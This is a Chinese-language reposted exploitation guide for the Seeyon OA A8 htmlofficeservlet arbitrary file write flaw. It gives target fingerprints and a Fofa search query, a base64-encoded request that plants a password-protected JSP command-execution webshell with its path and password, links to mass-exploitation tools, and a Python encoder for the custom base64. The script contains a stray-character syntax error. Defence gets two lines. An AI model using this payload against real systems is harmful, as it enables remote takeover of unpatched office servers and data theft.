碼上快樂

相關內容    簡體    繁體

致遠 OA A8 htmlofficeservlet getshell 漏洞

本文轉載自   查看原文   2020-04-29 17:35   8908    08、{ 滲透測試

0x00 漏洞簡介

致遠 OA 在國內的用戶也比較多, 2019年攻防演練暴出來 htmlofficeservlet getshell 漏洞

0x01 影響組件

致遠A8-V5協同管理軟件 V6.1sp1
致遠A8+協同管理軟件 V7.0、V7.0sp1、V7.0sp2、V7.0sp3
致遠A8+協同管理軟件 V7.1

0x02 漏洞指紋

/seeyon/htmlofficeservlet
/seeyon/index.jsp
seeyon
Fofa:app="用友-致遠OA"

0x03 漏洞分析

致遠 OA A8 htmlofficeservlet getshell (POC&EXP) – Reber’s Blog
http://wyb0.com/posts/2019/seeyon-htmlofficeservlet-getshell/

0x04 漏洞利用

第1步:訪問/seeyon/htmlofficeservlet
如果出現下圖所示的內容,表示存在漏洞。

第2步:構造PoC
把下面的PoC經base64解碼就是POST數據包內容:

REJTVEVQIFYzLjAgICAgIDM1NSAgICAgICAgICAgICAwICAgICAgICAgICAgICAgNjY2ICAgICAgICAgICAgIERCU1RFUD1PS01MbEtsVg0KT1BUSU9OPVMzV1lPU1dMQlNHcg0KY3VycmVudFVzZXJJZD16VUNUd2lnc3ppQ0FQTGVzdzRnc3c0b0V3VjY2DQpDUkVBVEVEQVRFPXdVZ2hQQjNzekIzWHdnNjYNClJFQ09SRElEPXFMU0d3NFNYekxlR3c0VjN3VXczelVvWHdpZDYNCm9yaWdpbmFsRmlsZUlkPXdWNjYNCm9yaWdpbmFsQ3JlYXRlRGF0ZT13VWdoUEIzc3pCM1h3ZzY2DQpGSUxFTkFNRT1xZlRkcWZUZHFmVGRWYXhKZUFKUUJSbDNkRXhReVlPZE5BbGZlYXhzZEdoaXlZbFRjQVRkTjFsaU40S1h3aVZHemZUMmRFZzYNCm5lZWRSZWFkRmlsZT15UldaZEFTNg0Kb3JpZ2luYWxDcmVhdGVEYXRlPXdMU0dQNG9FekxLQXo0PWl6PTY2DQo8JUAgcGFnZSBsYW5ndWFnZT0iamF2YSIgaW1wb3J0PSJqYXZhLnV0aWwuKixqYXZhLmlvLioiIHBhZ2VFbmNvZGluZz0iVVRGLTgiJT48JSFwdWJsaWMgc3RhdGljIFN0cmluZyBleGN1dGVDbWQoU3RyaW5nIGMpIHtTdHJpbmdCdWlsZGVyIGxpbmUgPSBuZXcgU3RyaW5nQnVpbGRlcigpO3RyeSB7UHJvY2VzcyBwcm8gPSBSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKGMpO0J1ZmZlcmVkUmVhZGVyIGJ1ZiA9IG5ldyBCdWZmZXJlZFJlYWRlcihuZXcgSW5wdXRTdHJlYW1SZWFkZXIocHJvLmdldElucHV0U3RyZWFtKCkpKTtTdHJpbmcgdGVtcCA9IG51bGw7d2hpbGUgKCh0ZW1wID0gYnVmLnJlYWRMaW5lKCkpICE9IG51bGwpIHtsaW5lLmFwcGVuZCh0ZW1wKyJcbiIpO31idWYuY2xvc2UoKTt9IGNhdGNoIChFeGNlcHRpb24gZSkge2xpbmUuYXBwZW5kKGUuZ2V0TWVzc2FnZSgpKTt9cmV0dXJuIGxpbmUudG9TdHJpbmcoKTt9ICU+PCVpZigiYXNhc2QzMzQ0NSIuZXF1YWxzKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJwd2QiKSkmJiEiIi5lcXVhbHMocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKSl7b3V0LnByaW50bG4oIjxwcmU+IitleGN1dGVDbWQocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKSArICI8L3ByZT4iKTt9ZWxzZXtvdXQucHJpbnRsbigiOi0pIik7fSU+NmU0ZjA0NWQ0Yjg1MDZiZjQ5MmFkYTdlMzM5MGQ3Y2U=


第3步:訪問webshell
webshell地址為/seeyon/test123456.jsp,密碼為:asasd3344。

Python腳本,參考鏈接:https://github.com/nian-hua/CVEScript/blob/master/致遠OA/zhiyuan.py

Other

timwhitez/seeyon-OA-A8-GetShell: 致遠OA A8 某些版本批量getshell漏洞/seeyon OA A8 some version getshell from url list
https://github.com/timwhitez/seeyon-OA-A8-GetShell

致遠 OA A8 htmlofficeservlet getshell (POC&EXP) – Reber’s Blog
http://wyb0.com/posts/2019/seeyon-htmlofficeservlet-getshell/

這里還有個XXE

致遠OA帆軟報表組件前台XXE漏洞(0day)挖掘過程 LandGrey’s Blog
https://landgrey.me/blog/8/

0x05 利用技巧

1.這個漏洞也挺有意思的, 這個接口是一個金格iweboffice用來處理文件的, 屬於一個第三方接口暴露導致的安全問題

這個漏洞網傳的腳本都是一個文件名test123456.jsp, 很容易被人錘啊

這里貼一個小腳本可以加解密文件名屬性之類的, 算法也很簡單, 漏洞通告的當天就寫出來了, 就是一個換了碼表的base64

from sys import argv

letters = "gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6"


def base64_encode(input_str):
    str_ascii_list = ['{:0>8}'.format(str(bin(ord(i))).replace('0b', ''))
                      for i in input_str]
    output_str = ''
    equal_num = 0
    while str_ascii_list:
        temp_list = str_ascii_list[:3]
        if len(temp_list) != 3:
            while len(temp_list) < 3:
                equal_num += 1
                temp_list += ['0' * 8]
        temp_str = ''.join(temp_list)
        temp_str_list = [temp_str[x:x + 6] for x in [0, 6, 12, 18]]
        temp_str_list = [int(x, 2) for x in temp_str_list]
        if equal_num:
            temp_str_list = temp_str_list[0:4 - equal_num]
        output_str += ''.join([letters[x] for x in temp_str_list])
        str_ascii_list = str_ascii_list[3:]
    output_str = output_str + '=' * equal_num
    return output_str


def base64_decode(input_str):
    str_ascii_list = ['{:0>6}'.format(str(bin(letters.index(i))).replace('0b', ''))
                      for i in input_str if i != '=']
    output_str = ''
    equal_num = input_str.count('=')
    while str_ascii_list:
        temp_list = str_ascii_list[:4]
        temp_str = ''.join(temp_list)
        if len(temp_str) % 8 != 0:
            temp_str = temp_str[0:-1 * equal_num * 2]
        temp_str_list = [temp_str[x:x + 8] for x in [0, 8, 16]]
        temp_str_list = [int(x, 2) for x in temp_str_list if x]
        output_str += ''.join([chr(x) for x in temp_str_list])
        str_ascii_list = str_ascii_list[4:]
    return output_str


if __name__ == "__main__":
    if len(argv) == 2:
        print(base64_decode(argv[1]))
    elif len(argv) == 3:
        if argv[1] == '-d':
            print(base64_decode(argv[2]))
        else:
            print(base64_encode(argv[2]))
    else:
        print("Seeyon OA /seeyon/htmlofficeservlet param encode/decode")
        print("Usage:")
        print("python %s encoded_str" % argv[0])t
        print("python %s -d encoded_str" % argv[0])
        print("python %s -e raw_str" % argv[0])

防護方法

1.及時更新補丁

2.使用waf攔截


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 致遠OA htmlofficeservlet任意文件寫入漏洞 致遠OA A8系統遠程命令執行漏洞 致遠 OA 組合 getshell 實戰滲透致遠OA系統多版本Getshell漏洞復現 辦公系統致遠OA漏洞 致遠OA-A8協同管理軟件無需登錄getshell漏洞 致遠OA ajaxAction formulaManager 文件上傳漏洞 通達oa getshell漏洞復現 致遠A8任意文件寫入+getshell(CNVD-2019-19299) 應用安全 - 工具 | 框架 - 致遠OA - 漏洞匯總
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM